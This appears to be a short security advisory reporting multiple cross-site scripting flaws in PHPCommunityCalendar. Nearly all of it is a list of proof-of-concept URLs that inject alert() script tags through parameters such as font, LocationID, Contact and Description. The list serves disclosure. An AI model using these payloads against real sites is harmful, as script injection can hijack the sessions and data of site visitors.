|
|
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
No exploit is required. Several examples have been provided: http://www.example.com/[path]/thankyou.php?LocationID="><script>alert('LOL')</script> http://www.example.com/[path]/calDaily.php?font="><script>alert('LOL')<script><" http://www.example.com/[path]/calMonthly.php?font="><script>alert('LOL'</script><" http://www.example.com/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><" http://www.example.com/[path]/calWeekly.php?font="><script>alert('LOL')</script><" http://www.example.com/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><" http://www.example.com/[path]/calYearly.php?font="><script>alert('LOL')</script><" http://www.example.com/[path]/calYearlyP.php?font="><script>alert('LOL')</script><" http://www.example.com/[path]/day.php?font="><script>alert('LOL')</script><!-- http://www.example.com/[path]/day.php?LocationID="><script>alert('LOL')</script><!-- http://www.example.com/[path]/event.php?font="><script>alert('LOL')</script> http://www.example.com/[path]/event.php?CeTi=</title><script>alert('LOL')</script> http://www.example.com/[path]/event.php?Contact=<script>alert('LOL')</script> http://www.example.com/[path]/event.php?Description=<script>alert('LOL')</script> http://www.example.com/[path]/event.php?ShowAddress=<script>alert('LOL')</script> http://www.example.com/[path]/week.php?font="><script>alert('LOL')</script> |
|
Privacy Statement |